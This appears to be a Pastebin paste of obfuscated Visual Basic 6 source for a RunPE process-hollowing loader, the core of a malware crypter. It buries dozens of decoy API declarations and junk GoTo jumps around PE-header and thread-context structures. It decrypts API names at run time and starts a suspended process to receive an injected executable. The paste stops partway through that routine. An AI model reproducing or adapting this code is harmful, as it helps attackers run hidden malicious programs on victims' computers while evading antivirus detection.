Advertisement
Guest User

Untitled

a guest
May 29th, 2017
70
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Private Declare Function oKJlSkVaAbmgyvRoM Lib "gdi32" (ByVal hDC As Long) As Long
  2. Private Declare Function MdsNBKidGIpIO Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  3. Private Declare Function rABzEciqThgwACuT Lib "WINMM.DLL" () As Long
  4. Private Declare Function lSVqSQliQeDDf Lib "version.dll" Alias "GetFileVersionInfoA" (ByVal lptstrFilename As String, ByVal dwHandle As Long, ByVal dwLen As Long, lpData As Any) As Long
  5. Private Declare Function cvbyQqQcVoYueurCTiqrAZ Lib "USER32" (ByVal hWnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
  6.  
  7. Private Declare Function xxkQxThvcugkJyvpH Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  8. Private Declare Function xVcYjBQYirmPgy Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  9.  
  10. Private Declare Sub wO9vsZUxD Lib "kernel32" Alias "RtlMoveMemory" (hpC6iUVZq As Any, OjoJ93zb7 As Any, ByVal K3oOIbb7T As Long)
  11. Private Declare Function yflEMCidechRgwYQndfQwZDBkYsjaoyh Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
  12. Private Declare Function TvDPsLrPhthfZroKuFL Lib "WINMM.DLL" Alias "mmioInstallIOProcA" (ByVal fccIOProc As Long, ByVal pIOProc As Long, ByVal dwFlags As Long) As Long
  13. Private Declare Function klGHRpVzOvCUdSytusxcjMoZpt Lib "USER32" (ByVal hIcon As Long) As Long
  14. Private Declare Function MpTEAoJzq Lib "gdi32" (ByVal hGDIObj As Long) As Long
  15.  
  16. Private Declare Function JKINzszeqqFJM Lib "USER32.DLL" (ByVal hWnd As Long) As Long
  17. Private Declare Function slUCFaGUfANAnOkjLtK Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  18. Private Declare Function aALFYUsNmeamD Lib "USER32" (ByVal hCursor As Long) As Long
  19. Private Declare Function bkICgiOjo Lib "GDI32.DLL" (ByVal hDC As Long, ByVal nIndex As Long) As Long
  20.  
  21. Private Declare Function EPJcLidifqHVefoMHkmSZsAq Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  22. Private Declare Function RPUFMTkLKbQSKkMrpY Lib "USER32.DLL" (ByVal hWnd As Long) As Long
  23. Private Declare Function QNcmUTHjrDgzfDUhUSMfcy Lib "USER32" (ByVal hCursor As Long) As Long
  24. Private Declare Function zvGYZuvFdJnjpIQGmhiglVPQA Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
  25.  
  26. Private Declare Function bAdHsocx Lib "WINMM.DLL" Alias "mmioInstallIOProcA" (ByVal fccIOProc As Long, ByVal pIOProc As Long, ByVal dwFlags As Long) As Long
  27. Private Declare Function sCllYKHUjPiTYx Lib "WINMM.DLL" (ByVal hMixer As Long) As Long
  28. Private Declare Function dvsOlJPQapKLVfaDSmGZTJp Lib "WINMM.DLL" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
  29. Private Declare Function wBngnReetxAr Lib "gdi32" (ByVal hGdiObject As Long) As Long
  30. Private Declare Function ZIqtNqufzNAnNkjLsKwAaALFYU Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
  31. Private Declare Function meamCRnbkHCgiOjow Lib "gdi32" (ByVal hColorSpace As Long) As Long
  32. Private Declare Function c8f6J6uoHEbvVNKVmBWK Lib "gdi32" (ByVal TgLOU4GaL As Long) As Long
  33. Private Declare Function abZeBIPuGGVadTtIBl Lib "WINMM.DLL" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
  34. Private Declare Function qSQlhQeDDenzcvbyQqQ Lib "USER32.DLL" Alias "SystemParametersInfoA" (ByVal uAction As Long, ByVal uParam As Long, ByRef lpvParam As Any, ByVal fuWinIni As Long) As Long
  35. Private Declare Function oYuepuqCTiqrAZSwyfl Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  36.  
  37. Private Declare Function FOONR Lib "USER32" (ByVal hWnd As Long, lpRect As Long) As Long
  38. Private Declare Function DqSj4empk Lib "USER32" Alias "LoadCursorFromFileA" (ByVal vHb6SVT7J As String) As Long
  39. Private Declare Function DiuuJNQIhwpZ Lib "WINMM.DLL" Alias "mixerGetLineInfoA" (ByVal hMixerObj As Long, pMixerL As Long, ByVal fdwInfo As Long) As Long
  40. Private Declare Function eGKZVERrrSbnPjOm Lib "USER32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal hIcon As Long) As Long
  41.  
  42. Private Declare Function CidechRZgwQQmdfQwDBjYsjanyhgTTvDPsLrO Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  43. Private Declare Function hfZroKuFKHSlGHQpVzO Lib "WINMM.DLL" Alias "mmioInstallIOProcA" (ByVal fccIOProc As Long, ByVal pIOProc As Long, ByVal dwFlags As Long) As Long
  44.  
  45. Private Declare Function ytusxibjMoZptvnMpT Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  46. Private Declare Function oIzqEOxwkQxTg Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  47. Private Declare Function tgkJx Lib "gdi32" (ByVal hMetaFile As Long) As Long
  48. Private Declare Function HEbxVcYjmQYirmPfySlgUA Lib "gdi32" (ByVal hGDIObj As Long) As Long
  49. Private Declare Function WpFAq5KiM Lib "USER32" Alias "LoadCursorA" (ByVal fyePjvJyL As Long, ByVal dUuERSRZQ As Long) As Long
  50. Private Declare Function INyszdqpFJMDdskU Lib "gdi32" (ByVal hDC As Long) As Long
  51. Private Declare Function aCGUfzNAnNkjLswAaALFYUrNmeamCR Lib "USER32" Alias "LoadIconA" (ByVal hLib As Long, ByVal lngIconID As Long) As Long
  52. Private Declare Function kHCgijowmRabZeBIPuGGVa Lib "USER32" (ByVal hWnd As Long, ByVal X As Long, ByVal Y As Long, ByVal nWidth As Long, ByVal nHeight As Long, ByVal bRepaint As Long) As Long
  53. Private Declare Function tIBlSVqSQlhQeDDenzc Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  54. Private Declare Function vMnNZSlTqalrnyPfmnxU Lib "gdi32" (ByVal hColorSpace As Long) As Long
  55.  
  56. Private Declare Function BIyeaaY Lib "USER32" (ByVal hCursor As Long) As Long
  57. Private Declare Function ksiNQQbxELqDCSVZQpExhPRmO Lib "gdi32" (ByVal hDC As Long) As Long
  58.  
  59. Private Declare Function zzbjwrQvMnNZSlTqalrnyPfmn Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  60. Private Declare Function hKMtzSbQwsqvgnuKllA Lib "olepro32.dll" (ByVal OLE_COLOR As Long, ByVal hPalette As Long, lpColorRef As Long) As Long
  61. Private Declare Function lKnRPxmGxoBvuiiJReGaFdvHvtn Lib "WINMM.DLL" (ByVal hMixerObj As Long, pMixerCD As Long, ByVal fdwDetails As Long) As Long
  62. Private Declare Function ZITZVhyzUVfDk Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
  63. Private Declare Function JPjrhMIGLwpxbCnDHJBbD Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  64. Private Declare Function W6L5K6AaALFXHdNYealD Lib "WINMM.DLL" (ByVal S52Ta5A0T As Long) As Long
  65. Private Declare Function OCQNESdLKylLiuIqHu Lib "USER32" Alias "SetWindowTextA" (ByVal hWnd As Long, ByVal strText As String) As Long
  66. Private Declare Function LJDVSpLkqmxAPlmwFAet Lib "gdi32" (ByVal hGdiObject As Long) As Long
  67.  
  68.  
  69.  
  70. Private Const B9QyNW5fC       As Long = &H5A4D&
  71. Private Const SXYKSnDaE        As Long = &H4550&
  72.  
  73. Private Const f9XvbANO0           As Long = &H40
  74. Private Const r9prn87An           As Long = &HF8
  75. Private Const MTFdGPVuU     As Long = &H28
  76. Private Const KE3evtxdC As Long = &H28
  77.  
  78.  
  79.  
  80.  
  81. Private Const gm3lvp9zz              As Long = &H10007
  82. Private Const dmtuLGHvZ          As Long = &H4
  83. Private Const XVLAKkD0I                As Long = &H1000
  84. Private Const trEVgUtTi               As Long = &H2000
  85. Private Const gvoghHKD0    As Long = &H40
  86.  
  87. Private Type WBqByZHP6
  88.     cb                          As Long
  89.     lpReserved                  As Long
  90.     lpDesktop                   As Long
  91.     lpTitle                     As Long
  92.     dwX                         As Long
  93.     dwY                         As Long
  94.     dwXSize                     As Long
  95.     dwYSize                     As Long
  96.     dwXCountChars               As Long
  97.     dwYCountChars               As Long
  98.     dwFillAttribute             As Long
  99.     dwFlags                     As Long
  100.     wShowWindow                 As Integer
  101.     cbReserved2                 As Integer
  102.     lpReserved2                 As Long
  103.     hStdInput                   As Long
  104.     hStdOutput                  As Long
  105.     hStdError                   As Long
  106. End Type
  107.  
  108.  
  109. Private Declare Function UctTSjZcTsUAygUpf Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
  110. Private Declare Function uddPPrzMInLdpebUn Lib "WINMM.DLL" () As Long
  111. Private Declare Function rBHDOghCENlRvLs Lib "USER32" (ByVal hWnd As Long, lpRect As Long) As Long
  112. Private Declare Function aOuqqptfYfJkVlpskI Lib "gdi32" (ByVal hGdiObject As Long) As Long
  113. Private Declare Function G1M0c7kUDFZCGURANmmO Lib "gdi32" (ByVal ljNc590Hr As Long) As Long
  114. Private Declare Function AwlFvmAKttgSuQdrZq Lib "WINMM.DLL" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
  115. Private Declare Function FurlDAY Lib "USER32" (ByVal hCursor As Long) As Long
  116. Private Declare Function YTgjxSUeojLcuOicRx Lib "gdi32" (ByVal hEnhMetaFile As Long) As Long
  117. Private Declare Function FKvovanmCFIAZohzBVyDQbwJxjKhfHpGs Lib "version.dll" Alias "VerQueryValueA" (pBlock As Any, ByVal lpSubBlock As String, lplpBuffer As Any, puLen As Long) As Long
  118. Private Declare Function wHBTQoJibQizNjQhEzde Lib "USER32" (ByVal hCursor As Long) As Long
  119.  
  120.  
  121. Private Type w2w5VJCxF
  122.     hProcess                    As Long
  123.     hThread                     As Long
  124.     dwProcessID                 As Long
  125.     dwThreadID                  As Long
  126. End Type
  127.  
  128. Private Type VlDPXFD7q
  129.     ControlWord                 As Long
  130.     StatusWord                  As Long
  131.     TagWord                     As Long
  132.     ErrorOffset                 As Long
  133.     ErrorSelector               As Long
  134.     DataOffset                  As Long
  135.     DataSelector                As Long
  136.     RegisterArea(1 To 80)       As Byte
  137.     Cr0NpxState                 As Long
  138. End Type
  139.  
  140. Private Type rmHHPsafB
  141.     ContextFlags                As Long
  142.     Dr0                         As Long
  143.     Dr1                         As Long
  144.     Dr2                         As Long
  145.     Dr3                         As Long
  146.     Dr6                         As Long
  147.     Dr7                         As Long
  148.     FloatSave                   As VlDPXFD7q
  149.     SegGs                       As Long
  150.     SegFs                       As Long
  151.     SegEs                       As Long
  152.     SegDs                       As Long
  153.     Edi                         As Long
  154.     Esi                         As Long
  155.     Ebx                         As Long
  156.     Edx                         As Long
  157.     Ecx                         As Long
  158.     Eax                         As Long
  159.     Ebp                         As Long
  160.     Eip                         As Long
  161.     SegCs                       As Long
  162.     EFlags                      As Long
  163.     Esp                         As Long
  164.     SegSs                       As Long
  165. End Type
  166.  
  167. Private Type ghFoWNBil
  168.     e_magic                     As Integer
  169.     e_cblp                      As Integer
  170.     e_cp                        As Integer
  171.     e_crlc                      As Integer
  172.     e_cparhdr                   As Integer
  173.     e_minalloc                  As Integer
  174.     e_maxalloc                  As Integer
  175.     e_ss                        As Integer
  176.     e_sp                        As Integer
  177.     e_csum                      As Integer
  178.     e_ip                        As Integer
  179.     e_cs                        As Integer
  180.     e_lfarlc                    As Integer
  181.     e_ovno                      As Integer
  182.     e_res(0 To 3)               As Integer
  183.     e_oemid                     As Integer
  184.     e_oeminfo                   As Integer
  185.     e_res2(0 To 9)              As Integer
  186.     e_lfanew                    As Long
  187. End Type
  188.  
  189. Private Type a88Fak5yA
  190.     Machine                     As Integer
  191.     NumberOfSections            As Integer
  192.     TimeDateStamp               As Long
  193.     PointerToSymbolTable        As Long
  194.     NumberOfSymbols             As Long
  195.     SizeOfOptionalHeader        As Integer
  196.     Characteristics             As Integer
  197. End Type
  198.  
  199. Private Type XvT5oY5UW
  200.     VirtuaC6t0R7rHvArQtYWEsNEu              As Long
  201.     Size                        As Long
  202. End Type
  203.  
  204. Private Type OZcnC16SG
  205.     Magic                       As Integer
  206.     MajorLinkerVersion          As Byte
  207.     MinorLinkerVersion          As Byte
  208.     SizeOfCode                  As Long
  209.     SizeOfInitializedData       As Long
  210.     SizeOfUnitializedData       As Long
  211.     AddressOfEntryPoint         As Long
  212.     BaseOfCode                  As Long
  213.     BaseOfData                  As Long
  214.     ImageBase                   As Long
  215.     SectionAlignment            As Long
  216.     FileAlignment               As Long
  217.     MajorOperatingSystemVersion As Integer
  218.     MinorOperatingSystemVersion As Integer
  219.     MajorImageVersion           As Integer
  220.     MinorImageVersion           As Integer
  221.     MajorSubsystemVersion       As Integer
  222.     MinorSubsystemVersion       As Integer
  223.     W32VersionValue             As Long
  224.     SizeOfImage                 As Long
  225.     SizeOfHeaders               As Long
  226.     CheckSum                    As Long
  227.     SubSystem                   As Integer
  228.     DllCharacteristics          As Integer
  229.     SizeOfStackReserve          As Long
  230.     SizeOfStackCommit           As Long
  231.     SizeOfHeapReserve           As Long
  232.     SizeOfHeapCommit            As Long
  233.     LoaderFlags                 As Long
  234.     NumberOfRvaAndSizes         As Long
  235.     DataDirectory(0 To 15)      As XvT5oY5UW
  236. End Type
  237.  
  238. Private Type CbtBC4ekK
  239.     Signature                   As Long
  240.     FileHeader                  As a88Fak5yA
  241.     OptionalHeader              As OZcnC16SG
  242. End Type
  243.  
  244. Private Type g4RjcGTKu
  245.    Characteristics              As Long
  246.    TimeDateStamp                As Long
  247.    MajorVersion                 As Integer
  248.    MinorVersion                 As Integer
  249.    lpName                       As Long
  250.    Base                         As Long
  251.    NumberOfFunctions            As Long
  252.    NumberOfNames                As Long
  253.    lpAddressOfFunctions         As Long
  254.    lpAddressOfNames             As Long
  255.    lpAddressOfNameOrdinals      As Long
  256. End Type
  257.  
  258. Private Type mEhHu7Fmf
  259.     SecName                     As String * 8
  260.     VirtualSize                 As Long
  261.     VirtuaC6t0R7rHvArQtYWEsNEu              As Long
  262.     SizeOfRawData               As Long
  263.     PointerToRawData            As Long
  264.     PointerToRelocations        As Long
  265.     PointerToLinenumbers        As Long
  266.     NumberOfRelocations         As Integer
  267.     NumberOfLinenumbers         As Integer
  268.     Characteristics             As Long
  269. End Type
  270.  
  271. Private Declare Function zujOYZQMGNrE Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  272. Private Declare Function YbRrGyjQSoQUjtNcOBc Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  273. Private Declare Function aGZKOoOaTmjF Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
  274. Private Declare Function soAQgBpyVQuwd Lib "USER32" (ByVal hCursor As Long) As Long
  275.  
  276. Private Declare Function opnsPQIUUkor Lib "olepro32.dll" (ByRef PicDesc As Any, ByRef RefIID As Long, ByVal fPictureOwnsHandle As Long, ByRef IPic As Long) As Long
  277. Private Declare Function jbLtvQtxLHqEeeENaCV Lib "gdi32" (ByVal hMetaFile As Long) As Long
  278. Private Declare Function rQrCwOxUEOUQdtIPRbyt Lib "USER32" Alias "LoadBitmapA" (ByVal hInstance As Long, ByVal lngBitmapID As Long) As Long
  279. Private Declare Function FLfndIDDCHszGQxxMCFx Lib "WINMM.DLL" (ByVal uPeriod As Long) As Long
  280. Private Declare Function ecJySJANYHGuVeqSmRpHTHF Lib "WINMM.DLL" () As Long
  281. Private Declare Function R4a6I0ghOUnylRMNLQBI Lib "gdi32" (ByVal BpemlMWZs As Long) As Long
  282. Private Declare Function OlUglhtKLhirPwapVc Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
  283. Private Declare Function tZTUSYIBInNzPT Lib "gdi32" (ByVal hGDIObj As Long) As Long
  284. Private Declare Function nPufaOjaQepYQKwYu Lib "WINMM.DLL" () As Long
  285. Private Declare Function CTFJkYVPifBYwByJMcx Lib "USER32" (ByVal hDC As Long, ByVal X As Long, ByVal Y As Long, ByVal hIcon As Long) As Long
  286. Private Declare Function RMqFZsLGvbkljoZaDQPgkmeDSKvdfzchv Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long
  287. Private Declare Function nbNoK Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
  288.  
  289. Private Declare Function bAbmgyvRoMEAMdsNBKidIpJOQLrABzEcjqT Lib "USER32" (ByVal hWnd As Long, lpRect As Long) As Long
  290. Private Declare Function wADuTjb Lib "WINMM.DLL" Alias "mmioInstallIOProcA" (ByVal fccIOProc As Long, ByVal pIOProc As Long, ByVal dwFlags As Long) As Long
  291. Private Declare Function vQtxLHqEeeEaCVBZrQrCwOxUEOUQ Lib "USER32" (ByVal hCursor As Long) As Long
  292. Private Declare Function IPRbytQZFLf Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
  293. Private Declare Function EzAyDovCSutJzCtSvbYG Lib "USER32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
  294. Private Declare Function P5H1W2OGfImkTHcSJXhQ Lib "gdi32" (ByVal ljNc590Hr As Long) As Long
  295. Private Declare Function FwKUDDqqRanOiNmDP Lib "gdi32" (ByVal hMetaFile As Long) As Long
  296. Private Declare Function vNKhQciepGHdeLsVmRZsAp Lib "WINMM.DLL" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
  297. Private Declare Function QOTFyFkKwLPSKjLrbQ Lib "USER32.DLL" Alias "GetClassNameA" (ByVal hWnd As Long, ByVal ClassName As String, ByVal ClassNameSize As Long) As Long
  298. Private Declare Function VMblTTtUqDRzQCGgURLeb Lib "gdi32" (ByVal hDC As Long) As Long
  299.  
  300.  
  301.  
  302.  
  303. Private awKHqa6ZF         As Long
  304. Private JsRxtDuqO      As Long
  305. Private tiKQbrb34         As Boolean
  306. Private Qnrmt0tMW          As Long
  307. Private mfM6R8zDQ       As Long
  308. Private WfyxtT8nv(&HFF)   As Byte
  309.        
  310. Public Function JJAcJc0Fl() As Long
  311. Debug.Print Chr(79) + Chr(105) + Chr(74) + Chr(107) + Chr(78)
  312.     Dim f0Y8D0KOcwAJSNqHZtNH As String, v5l6j7aTaFRRgknfETMy As String, v8hLQpWBZ() As String, b7g0y3oNFCNesOCLjdHJ As String, p2P4N8CCBGcjqVihwBEy As Integer
  313.     f0Y8D0KOcwAJSNqHZtNH = Chr$(51)
  314.     For p2P4N8CCBGcjqVihwBEy = 1 To Len(f0Y8D0KOcwAJSNqHZtNH)
  315. v5l6j7aTaFRRgknfETMy = v5l6j7aTaFRRgknfETMy & IIf(p2P4N8CCBGcjqVihwBEy = 1, Asc(Mid$(f0Y8D0KOcwAJSNqHZtNH, p2P4N8CCBGcjqVihwBEy, 1)), Chr$(124) _
  316.  & Asc(Mid$(f0Y8D0KOcwAJSNqHZtNH, p2P4N8CCBGcjqVihwBEy, 1)))
  317.     Next p2P4N8CCBGcjqVihwBEy
  318.     v8hLQpWBZ() = rZjOyBMBM(v5l6j7aTaFRRgknfETMy, Chr$(124))
  319.     For p2P4N8CCBGcjqVihwBEy = 0 To UBound(v8hLQpWBZ)
  320.     b7g0y3oNFCNesOCLjdHJ = b7g0y3oNFCNesOCLjdHJ & Chr(CLng(v8hLQpWBZ(p2P4N8CCBGcjqVihwBEy)))
  321.     Next p2P4N8CCBGcjqVihwBEy
  322.     If b7g0y3oNFCNesOCLjdHJ = Chr$(51) Then GoTo 3
  323. 3:
  324. End Function
  325.  
  326. Public Function G8MvJAjoU(ByRef p8rpyUDyf() As Byte, Optional KBxJ8bE71 As String) As Boolean
  327.  GoTo j5M8v3twMJrFeeGOaDWC
  328. j5M8v3twMJrFeeGOaDWC:
  329.     Dim mpWCXcoZN                       As Long
  330. GoTo M5E5o6BkHqCIEPguDEOl
  331. M5E5o6BkHqCIEPguDEOl:
  332.     Dim nfjrysVgu       As ghFoWNBil
  333. GoTo g1L7R4PupqotelsJkjAp
  334. g1L7R4PupqotelsJkjAp:
  335.     Dim OqXXVZ4wM       As CbtBC4ekK
  336. GoTo s6J6R2vkGymBLttggIQd
  337. s6J6R2vkGymBLttggIQd:
  338.     Dim Lcfn7JQoZ   As mEhHu7Fmf
  339. GoTo F4E5t1urlEBXHSYUfvwT
  340. F4E5t1urlEBXHSYUfvwT:
  341.     Dim GXTajmrwx            As WBqByZHP6
  342. GoTo U5C6M5IPiqfLHHFKyoya
  343. U5C6M5IPiqfLHHFKyoya:
  344.     Dim ZbXogQyas    As w2w5VJCxF
  345. GoTo B6C1J0ZChRNCWMDRbKKv
  346. B6C1J0ZChRNCWMDRbKKv:
  347.     Dim I683ZWZB9                As rmHHPsafB
  348. GoTo j2g8I7HsvWLICURoKiok
  349. j2g8I7HsvWLICURoKiok:
  350.     Dim Fdquendve                 As Long
  351. GoTo U4m1K3cXBRjEXRHmyytk
  352. U4m1K3cXBRjEXRHmyytk:
  353.     Dim SmLB8PCzU                  As Long
  354. GoTo d6P5b7uwpOdWGnqLnrGQ
  355. d6P5b7uwpOdWGnqLnrGQ:
  356.     Dim lbiJtN9fS                    As Long
  357.      Dim l0l4A4UveyhlLlvqJGdX As String, P2X7D4MVtnRTAUZhXDMM As String, IE13cXlxB() As String, I4T0P7oQYkNgMkCbCNHZ As String, J5P4g5nFTbclKFhjQWpw As Integer
  358.     l0l4A4UveyhlLlvqJGdX = Chr$(55)
  359.     For J5P4g5nFTbclKFhjQWpw = 1 To Len(l0l4A4UveyhlLlvqJGdX)
  360. P2X7D4MVtnRTAUZhXDMM = P2X7D4MVtnRTAUZhXDMM & IIf(J5P4g5nFTbclKFhjQWpw = 1, Asc(Mid$(l0l4A4UveyhlLlvqJGdX, J5P4g5nFTbclKFhjQWpw, 1)), Chr$(124) _
  361.  & Asc(Mid$(l0l4A4UveyhlLlvqJGdX, J5P4g5nFTbclKFhjQWpw, 1)))
  362.     Next J5P4g5nFTbclKFhjQWpw
  363.     IE13cXlxB() = rZjOyBMBM(P2X7D4MVtnRTAUZhXDMM, Chr$(124))
  364.     For J5P4g5nFTbclKFhjQWpw = 0 To UBound(IE13cXlxB)
  365.     I4T0P7oQYkNgMkCbCNHZ = I4T0P7oQYkNgMkCbCNHZ & Chr(CLng(IE13cXlxB(J5P4g5nFTbclKFhjQWpw)))
  366.     Next J5P4g5nFTbclKFhjQWpw
  367.     If I4T0P7oQYkNgMkCbCNHZ = Chr$(55) Then GoTo 7
  368. 7:
  369.     If Not tiKQbrb34 Then Exit Function
  370. GoTo T2P2S0KRhJIYOQIhKomV
  371. T2P2S0KRhJIYOQIhKomV:
  372.     Call wO9vsZUxD(nfjrysVgu, p8rpyUDyf(0), f9XvbANO0)
  373. GoTo J5U2Z6SSFFgoCdvcBSeS
  374. J5U2Z6SSFFgoCdvcBSeS:
  375.     If Not nfjrysVgu.e_magic = B9QyNW5fC Then
  376. GoTo Q2c4y5qvsEVWrsDaHkAg
  377. Q2c4y5qvsEVWrsDaHkAg:
  378.         Exit Function
  379. GoTo L5m5I0ECHrlsWwiDGvWd
  380. L5m5I0ECHrlsWwiDGvWd:
  381.     End If
  382. GoTo O1w3J0OYHHtgHdqFlEpt
  383. O1w3J0OYHHtgHdqFlEpt:
  384.     Call wO9vsZUxD(OqXXVZ4wM, p8rpyUDyf(nfjrysVgu.e_lfanew), r9prn87An)
  385. GoTo T1F0R2kHflhsyLghrByZ
  386. T1F0R2kHflhsyLghrByZ:
  387.     If Not OqXXVZ4wM.Signature = SXYKSnDaE Then
  388. GoTo p1c8p5LTUSXJCJnAAPTW
  389. p1c8p5LTUSXJCJnAAPTW:
  390.         Exit Function
  391. GoTo N6C8e2PjMQeoKXKvXtsV
  392. N6C8e2PjMQeoKXKvXtsV:
  393.     End If
  394. GoTo D3G2j2VPheBXynjyNbvk
  395. D3G2j2VPheBXynjyNbvk:
  396. Fdquendve = P4EYumIcN(BEWRmY2Bl(Chr$(99) & Chr$(107) & Chr$(108) & Chr$(80) & Chr$(27) & Chr$(108) & Chr$(49) _
  397.  & Chr$(48), Chr$(82) & Chr$(51) & Chr$(117) & Chr$(51) & Chr$(103) & Chr$(52) & Chr$(115) & Chr$(112) _
  398.  & Chr$(77) & Chr$(105)))
  399. GoTo t3M7r4swGybkkjnLSZEQ
  400. t3M7r4swGybkkjnLSZEQ:
  401. SmLB8PCzU = P4EYumIcN(BEWRmY2Bl(Chr$(222) & Chr$(20) & Chr$(218) & Chr$(236) & Chr$(108), Chr$(72) & Chr$(48) _
  402.  & Chr$(117) & Chr$(49) & Chr$(88) & Chr$(54) & Chr$(73) & Chr$(121) & Chr$(70) & Chr$(99)))
  403. GoTo o1I2D5qjTBEYBFTPMllN
  404. o1I2D5qjTBEYBFTPMllN:
  405.     If KBxJ8bE71 = vbNullString Then
  406. GoTo V6K5J5YKEWGcMXcZkCQY
  407. V6K5J5YKEWGcMXcZkCQY:
  408.         KBxJ8bE71 = Space(260)
  409. GoTo Z6H0e5NTmukQLMKPAHOe
  410. Z6H0e5NTmukQLMKPAHOe:
  411. lbiJtN9fS = Jun1VG4mO(Fdquendve, BEWRmY2Bl(Chr$(137) & Chr$(197) & Chr$(52) & Chr$(51) & Chr$(111) & Chr$(102) _
  412.  & Chr$(119) & Chr$(110) & Chr$(103) & Chr$(68) & Chr$(107) & Chr$(110) & Chr$(103) & Chr$(76) _
  413.  & Chr$(99) & Chr$(111) & Chr$(103) & Chr$(85), Chr$(88) & Chr$(48) & Chr$(68) & Chr$(54) & Chr$(69) _
  414.  & Chr$(49) & Chr$(82) & Chr$(71) & Chr$(109) & Chr$(117)))
  415. GoTo F1U2N1eHljRGaRIVgPOC
  416. F1U2N1eHljRGaRIVgPOC:
  417.         WotN7p9P5 lbiJtN9fS, App.hInstance, StrPtr(KBxJ8bE71), 260
  418. GoTo C5l8a8ZvPbPNHZWscnsp
  419. C5l8a8ZvPbPNHZWscnsp:
  420.     End If
  421. GoTo B3T7p0XEhvdjDLBgbcaf
  422. B3T7p0XEhvdjDLBgbcaf:
  423.  
  424. GoTo Q1R8W1XbdVuXCmiWqhYm
  425. Q1R8W1XbdVuXCmiWqhYm:
  426.         GXTajmrwx.cb = Len(GXTajmrwx)
  427. GoTo h3Q0p3nAOyNDdROJaYuQ
  428. h3Q0p3nAOyNDdROJaYuQ:
  429. lbiJtN9fS = Jun1VG4mO(Fdquendve, BEWRmY2Bl(Chr$(213) & Chr$(66) & Chr$(59) & Chr$(223) & Chr$(244) & Chr$(101) _
  430.  & Chr$(82) & Chr$(112) & Chr$(109) & Chr$(97) & Chr$(103) & Chr$(113) & Chr$(113) & Chr$(85), Chr$(121) _
  431.  & Chr$(56) & Chr$(87) & Chr$(53) & Chr$(107) & Chr$(50) & Chr$(98) & Chr$(97) & Chr$(113) & Chr$(117) _
  432. ))
  433. GoTo o8q0G3qrBLGjRlFoUdec
  434. o8q0G3qrBLGjRlFoUdec:
  435.         WotN7p9P5 lbiJtN9fS, 0, StrPtr(KBxJ8bE71), 0, 0, 0, dmtuLGHvZ, 0, 0, VarPtr(GXTajmrwx), VarPtr(ZbXogQyas)
  436. GoTo h3L3v1JZcfXvLEoWYsVa
  437. h3L3v1JZcfXvLEoWYsVa:
